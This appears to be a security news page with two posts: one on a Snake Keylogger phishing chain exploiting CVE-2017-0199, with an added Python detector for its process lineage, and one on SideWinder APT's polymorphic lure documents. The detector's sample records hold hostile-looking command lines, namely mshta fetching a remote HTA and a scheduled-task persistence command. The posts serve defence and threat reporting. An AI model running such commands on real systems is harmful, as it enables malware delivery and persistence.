Showing posts with label CVE-2017-0199.

New Version of Snake Keylogger Targets Victims Through Phishing Emails


Researchers at Fortinet's FortiGuard Labs have uncovered a newly evolved variant of the Snake Keylogger, a type of malicious software notorious for capturing and recording everything a user types. Keyloggers are often used by cybercriminals to steal personal information, such as passwords, credit card numbers, and other sensitive data. This new variant of Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is being distributed through phishing campaigns and has been upgraded to exploit specific vulnerabilities, making it even more dangerous.

The attack is initiated by a deceptive phishing email that pretends to be a notification about a financial transaction. FortiGuard Labs’ security systems identified the email, which was flagged with the subject line “[virus detected],” and it contains an attached Excel file named “swift copy.xls.” Although the file may appear harmless, opening it sets off a chain reaction that ultimately leads to the installation of the Snake Keylogger on the recipient's computer.

The Excel file attached to the phishing email is no ordinary spreadsheet—it has been specially crafted to take advantage of a known security vulnerability, CVE-2017-0199. This vulnerability allows attackers to execute code remotely by embedding a malicious link within the file. When the victim opens the document, this hidden link discreetly connects to a remote server, which then delivers a secondary malicious file in the form of an HTA (HTML Application) file. This file, containing obfuscated JavaScript, is executed automatically by the Windows operating system, setting the stage for further malicious actions.

The HTA file is programmed to run a VBScript that initiates the download and execution of a final payload—a malicious executable named “sahost.exe”—from a remote server. This payload, known as the Loader module, is designed with multiple layers of encryption and obfuscation, making it difficult for antivirus software to detect or analyse. Once executed, the Loader module unpacks additional encrypted components, including the main module of the Snake Keylogger, which is hidden within an encrypted Bitmap resource.

The Loader module not only delivers the Snake Keylogger but also ensures that it remains undetected and continues operating on the infected system. It accomplishes this by decrypting and loading several key components into the computer's memory, where they can execute without being noticed. Among these components is a critical module called “Tyrone.dll,” which plays a crucial role in the keylogger’s ability to persist on the victim's system. This persistence is maintained through a scheduled task that launches the keylogger whenever the computer is started.

Once installed, the Snake Keylogger operates stealthily, capturing everything the user types and taking screenshots of their activities. It targets a wide range of applications, including web browsers, email clients, and messaging software, and is capable of extracting saved credentials and other sensitive information from these programs. To avoid detection, the keylogger uses a technique called process hollowing, which involves injecting malicious code into a legitimate process, allowing it to operate without raising alarms.

One of the most concerning features of this keylogger is its ability to send the stolen data directly to the attacker via email. The keylogger uses SMTP to transmit the victim’s credentials and other sensitive information in real-time, enabling the attacker to quickly exploit the data or commit financial theft. Additionally, FortiGuard Labs discovered that this variant of Snake Keylogger employs sophisticated anti-analysis techniques. For example, it can detect if it is being run in a security research environment, in which case it refrains from sending the stolen data, making it harder for researchers to analyse the malware.
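The execution chain described above (Excel opening an HTA, the HTA running VBScript, the script dropping and launching an executable, and that executable registering a scheduled task) leaves a parent-child process trail that a SOC can look for. The following is an added example, not FortiGuard's code; it runs simple lineage rules over constructed Sysmon-style process-creation records. The image names mshta.exe, wscript.exe and schtasks.exe, the paths and the remote host are assumptions, not indicators from the report.

```python
"""Added example (not FortiGuard's code): flag the Snake Keylogger execution
chain in constructed process-creation records. Fields mimic Sysmon event 1
(pid, ppid, image, command line); host/path values below are assumptions."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Windows hosts for HTA and VBScript content (assumed image names)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed sample records, not taken from the report
SAMPLE = [
    Proc(100, 1, "explorer.exe", "explorer.exe"),
    Proc(200, 100, "excel.exe", 'excel.exe "swift copy.xls"'),
    Proc(300, 200, "mshta.exe", "mshta.exe http://[remote-host]/stage.hta"),
    Proc(400, 300, "wscript.exe", "wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\x.vbs"),
    Proc(500, 400, "sahost.exe", "C:\\Users\\u\\AppData\\Roaming\\sahost.exe"),
    Proc(600, 500, "schtasks.exe", "schtasks.exe /create /sc onstart /tn Updater"),
    Proc(700, 100, "notepad.exe", "notepad.exe"),
]

def ancestry(procs, pid):
    """Return lower-cased image names from pid up to the root, child first."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].image.lower())
        pid = by_pid[pid].ppid
    return chain

def findings(procs):
    """Return (pid, rule) pairs for records matching the chain's TTPs."""
    out = []
    for p in procs:
        img = p.image.lower()
        parents = ancestry(procs, p.ppid)  # parents[0] is the direct parent
        if not parents:
            continue
        cmd = p.cmdline.lower()
        # Office document handing control to an HTA/VBScript host
        if img in SCRIPT_HOSTS and parents[0] in OFFICE:
            out.append((p.pid, "office-spawned-script-host"))
        # Script host launching a dropped binary from a user-writable path
        if (img.endswith(".exe") and img not in SCRIPT_HOSTS
                and parents[0] in SCRIPT_HOSTS and "\\appdata\\" in cmd):
            out.append((p.pid, "script-host-ran-exe-from-appdata"))
        # Persistence: scheduled task created anywhere below an Office app
        if img == "schtasks.exe" and "/create" in cmd and any(a in OFFICE for a in parents):
            out.append((p.pid, "scheduled-task-from-office-lineage"))
    return out
```

Each rule fires on a relationship rather than a file hash, so it survives the re-packing and obfuscation of the Loader module described above.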

To protect against these types of threats, FortiGuard Labs advises caution when it comes to emails from unknown sources, especially those with attachments. It's imperative to keep all software up-to-date and utilise robust security solutions to prevent such attacks. By staying informed and vigilant, individuals and organizations can better protect themselves from this and other emerging cyber threats.




SideWinder APT Group: Victims in Pakistan and Turkey Stricken with Multiphase Polymorphic Attack


Government authorities and individuals in Turkey are apparently being targeted by India's well-known SideWinder APT group, which is using polymorphism techniques that enable it to bypass standard signature-based antivirus (AV) detection and deliver a next-stage payload.

In an article published on their blog on May 8, researchers from the BlackBerry Threat Research and Intelligence team described how the attacks use lure documents tailored to the targets' interests that, when opened, leverage a remote template injection vulnerability to deliver malicious payloads.

The campaign's first phase, identified last November, targeted victims in Pakistan with server-side polymorphic attacks, while a later phase, discovered earlier this year, uses phishing to deliver malicious lure documents to victims.

Rather than using malicious macros in the documents to disseminate malware, which is frequently the case when documents are used as lures, the APT uses the CVE-2017-0199 vulnerability to deliver the payloads.

How Polymorphism Deceives Defenders

Attackers have been using server-side polymorphism as a way to evade detection by AV tools. The researchers noted that it does this with malicious code that changes its appearance through encryption and obfuscation, ensuring that no two samples look the same and are therefore harder to analyze.

“The attack can fool defenders because it serves the victim with a new sample each time a link is clicked,” says Dmitry Bestuzhev, senior director of cyber-threat intelligence at BlackBerry. “In this case, each new download has a new hash, which effectively breaks hash-based detections used by security operations centers (SOCs) and some endpoint scanners,” he says.

“Since there’s a new hash each time, there is no information on a given sample on public multi scanners like VirusTotal unless each new sample is uploaded over and over for further analysis[…]So it makes life harder for the victims because of the lack of information on public sandboxes and other-like security services,” Bestuzhev continues. 

The Latest Threat Campaigns 

Blackberry researchers evaluated the campaign's numerous documents, which were located on an attacker-controlled server and distributed to victims. Researchers first came across one with the subject line "GUIDELINES FOR BEACON JOURNAL - 2023 PAKISTAN NAVY WAR COLLEGE (PNWC)," and in early December identified another that claimed to be a letter of offer and acceptance "for the purchase of defense articles, defense services, or both."

In both of these cases, “the name of the file ‘file.rtf’ and the file type are the same; however, the contents, file size and the file hash are different[…]This is an example of server-based polymorphism, where each time the server responds with a different version of the file, so bypassing the victim’s antivirus scanner (presuming the antivirus uses signature-based detection),” they added.

If the requesting user does not fall within the Pakistani IP range, the server returns an 8-byte RTF file that contains a single string. If the user is within the Pakistani IP range, the server instead returns the RTF payload, which varies between 406KB and 414KB in size.

Attacks Expanding to Turkey and Beyond 

Early in March, the researchers found a new malicious document connected to the prior attack that had been sent via phishing emails. This discovery suggested that Turkey had become a new target country for SideWinder. The researchers, who discovered the servers in mid-March, found that they had been set up so that a victim in Turkey could retrieve a second-stage payload.

While Southeast Asian regions like Pakistan and Sri Lanka have always been prime targets of SideWinder, the group's targeting of victims in Turkey makes sense given the geopolitical conditions, in which the Turkish government has backed Pakistan and drawn criticism from India, according to the researchers.

While polymorphic attacks overall can be difficult to defend against, detection and prevention strategies based on behavior and hashes can be effectively used against them, Bestuzhev notes.

“The key for organizations to mitigate these attacks”, Bestuzhev adds, “is not to focus on volatile indicators of compromise but on meaningful tactics, techniques, and procedures (TTPs) and behaviors in the system or code blocks covered by machine learning technologies.”